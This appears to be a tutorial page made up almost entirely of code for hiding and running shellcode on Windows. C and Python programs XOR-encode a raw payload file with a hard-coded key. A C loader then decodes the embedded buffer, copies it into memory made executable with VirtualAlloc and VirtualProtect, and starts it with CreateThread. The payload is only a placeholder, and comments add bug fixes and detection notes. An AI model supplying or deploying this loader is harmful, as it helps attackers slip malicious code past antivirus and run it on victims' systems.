XOR Encrypt Shellcode
XOR encryption
C code that XOR-encrypts the contents of a file and prints the result as a C array initializer.
#include <stdio.h>
#include <stdlib.h>
#include<windows.h>
#include<string.h>
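/*
 * In-place repeating-key XOR over data[0 .. data_len-1].
 *
 * key_len is expected to be the size of the key array INCLUDING its trailing
 * NUL (the caller in this listing passes `sizeof key`). The key index wraps
 * before it reaches key[key_len - 1], so only key[0 .. key_len-2] is applied
 * and the terminator is never XORed into the data.
 *
 * Running the function twice with the same key restores the original bytes.
 * A repeating XOR with a key stored as a plain string is obfuscation, not
 * confidentiality: anyone holding the program also holds the key.
 */
void XOR(char *data, size_t data_len, char *key, size_t key_len) {
    /*
     * With key_len == 0 the wrap test below compares against SIZE_MAX, so the
     * key index would run past the end of the key. Leave the data untouched.
     */
    if (key_len == 0) {
        return;
    }

    /* size_t indices: the original `int i` was compared against a size_t and
     * would overflow for buffers larger than INT_MAX. */
    size_t j = 0;
    for (size_t i = 0; i < data_len; i++) {
        if (j == key_len - 1) {
            j = 0;
        }
        data[i] = data[i] ^ key[j];
        j++;
    }
}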
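/*
 * Reads the file named by argv[1], XORs every byte with the hard-coded key
 * and prints the result, first raw and then as a C array initializer.
 *
 * Defects in the earlier version that this one corrects:
 *  - the file was opened in text mode, which alters binary input on Windows;
 *  - the read loop stored fgetc() in a `char` and compared it with EOF, so a
 *    0xFF byte ended the read early and the final EOF was written one byte
 *    past the end of the buffer;
 *  - the buffer was a variable-length array with an initializer, which is
 *    not valid C11 and puts a file-sized object on the stack;
 *  - the raw output used "%s" on a buffer that is not NUL-terminated;
 *  - no ", " was printed after the first element, and an empty file left
 *    the brace unclosed.
 *
 * Returns 0 on success and EXIT_FAILURE on any error.
 */
int main(int argc, char **argv)
{
    if (argc < 2) {
        printf("Format: ./xor.exe filename");
        return EXIT_FAILURE;
    }

    FILE *fp = fopen(argv[1], "rb");
    if (!fp) {
        printf("File does not exist\n");
        return EXIT_FAILURE;
    }

    /* Key used for the XOR pass. */
    char key[] = "SuperSecretKey";

    /* Seek to the end to learn the file size, then go back to the start. */
    if (fseek(fp, 0, SEEK_END) != 0) {
        printf("Could not determine file size\n");
        fclose(fp);
        return EXIT_FAILURE;
    }
    long file_size = ftell(fp);
    if (file_size < 0) {
        printf("Could not determine file size\n");
        fclose(fp);
        return EXIT_FAILURE;
    }
    rewind(fp);

    size_t len = (size_t)file_size;
    /* malloc(0) may legally return NULL, so always request at least one byte. */
    unsigned char *data = malloc(len ? len : 1);
    if (!data) {
        printf("Out of memory\n");
        fclose(fp);
        return EXIT_FAILURE;
    }

    size_t got = fread(data, 1, len, fp);
    fclose(fp);
    if (got != len) {
        printf("Short read\n");
        free(data);
        return EXIT_FAILURE;
    }

    /* XOR is its own inverse: a second call with the same key decodes. */
    XOR((char *)data, len, key, sizeof key);

    /* Raw bytes are written with an explicit length; they may contain NULs. */
    printf("XORed data:\n");
    fwrite(data, 1, len, stdout);
    printf("\n");

    /* Print in hex format, as a C array initializer. */
    printf("{");
    for (size_t i = 0; i < len; i++) {
        printf("0x%02X", data[i]);
        if (i + 1 < len) {
            printf(", ");
        }
    }
    printf("};");

    free(data);
    return 0;
}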
Python code that XOR-encrypts the contents of a file and prints the result as a C array initializer.
import sys
# Repeating XOR key; the same literal is the `key` array in the C listings on this page.
# NOTE(review): the key is hard-coded, and the decoder listing embeds the same
# string, so it can be read straight out of the source or the compiled binary.
KEY = "SuperSecretKey"
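def xor(data, key):
    """XOR every item of ``data`` with a repeating ``key``.

    ``data`` may be ``bytes`` (items are ints) or ``str`` (items are
    one-character strings). ``key`` is passed through ``str()`` and its
    characters are applied by code point, cycling when the key is shorter
    than the data.

    Returns a ``str`` holding one character per input item. An empty key
    with non-empty data raises ``ZeroDivisionError`` from the modulo.
    """
    key = str(key)
    key_len = len(key)

    def code_point(item):
        # bytes yield ints when indexed, str yields 1-char strings.
        return item if isinstance(item, int) else ord(item)

    # join() instead of repeated `+=`, which re-copies the string on each step.
    return "".join(
        chr(code_point(item) ^ ord(key[i % key_len]))
        for i, item in enumerate(data)
    )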
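def printCiphertext(ciphertext):
    """Print ``ciphertext`` as a brace-wrapped list of C hex literals.

    ``ciphertext`` is a ``str``; each character becomes ``0x`` followed by
    its code point in lower-case hex, without zero padding. An empty input
    prints ``{ };`` rather than the dangling ``{ 0x };`` the string
    concatenation used to produce.
    """
    literals = ", ".join("0x" + format(ord(ch), "x") for ch in ciphertext)
    if literals:
        print("{ " + literals + " };")
    else:
        print("{ };")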
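# Script body: read the file named on the command line, XOR it with KEY and
# print the result as a C array initializer.
try:
    # `with` closes the handle; the original left it open.
    with open(sys.argv[1], "rb") as payload_file:
        plaintext = payload_file.read()
except (IndexError, OSError):
    # Only a missing argument or an unreadable file is handled here; the
    # original bare `except:` also swallowed KeyboardInterrupt and real bugs.
    print("File argument needed! %s <raw payload file>" % sys.argv[0])
    sys.exit(1)  # non-zero so callers can tell the run failed
ciphertext = xor(plaintext, KEY)
# Reuse the helper instead of repeating its formatting expression.
printCiphertext(ciphertext)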
XOR Decryption & Execution
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
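/*
 * Repeating-key XOR applied in place to data[0 .. data_len-1].
 *
 * key_len is expected to count the key array's trailing NUL (main passes
 * `sizeof(key)`). The key index is reset before it reaches
 * key[key_len - 1], so the bytes actually used are key[0 .. key_len-2].
 *
 * The operation is its own inverse, which is why the same routine serves as
 * encoder and decoder. Because the key is a plain string in the same binary,
 * the encoded buffer can be recovered by anyone analysing that binary.
 */
void XOR(char *data, size_t data_len, char *key, size_t key_len) {
    /*
     * key_len == 0 would make `key_len - 1` wrap to SIZE_MAX and let the key
     * index walk off the end of the key; treat it as "nothing to do".
     */
    if (key_len == 0) {
        return;
    }

    /* Unsigned indices match the size_t lengths they are compared with. */
    size_t j = 0;
    for (size_t i = 0; i < data_len; i++) {
        if (j == key_len - 1) {
            j = 0;
        }
        data[i] = data[i] ^ key[j];
        j++;
    }
}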
/*
 * Decodes the embedded buffer with XOR(), copies it into freshly allocated
 * memory, changes that memory from read-write to execute-read, starts a
 * thread at its first byte and waits for the thread to finish.
 *
 * Detection note: every step is an ordinary Win32 call, but the sequence is
 * what memory scanners and endpoint telemetry are commonly tuned for: a
 * private region that goes from writable to executable, followed by a
 * thread whose start address lies inside that region rather than in a
 * loaded module. The static key string below is also a simple signature.
 */
int main(void) {
void * exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
// Placeholder text; sizeof below therefore counts its trailing NUL as well.
unsigned char calc_payload[] = "insert_xor_encrypted_payload_here";
unsigned int calc_len = sizeof(calc_payload);
char key[] = "SuperSecretKey";
// Region is requested read-write only; it is made executable further down.
// NOTE(review): the result is not checked, so a failed allocation reaches
// RtlMoveMemory as a NULL destination.
exec_mem = VirtualAlloc(0, calc_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Decode in place; sizeof(key) includes the NUL, which XOR() never applies.
XOR((char *) calc_payload, calc_len, key, sizeof(key));
RtlMoveMemory(exec_mem, calc_payload, calc_len);
// PAGE_READWRITE -> PAGE_EXECUTE_READ; rv is zero if the change failed.
rv = VirtualProtect(exec_mem, calc_len, PAGE_EXECUTE_READ, &oldprotect);
// Start the thread only if the protection change succeeded.
if ( rv != 0 ) {
// NOTE(review): th is neither checked for NULL nor closed with CloseHandle.
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
// -1 converts to 0xFFFFFFFF, the value of INFINITE: wait without timeout.
WaitForSingleObject(th, -1);
}
return 0;
}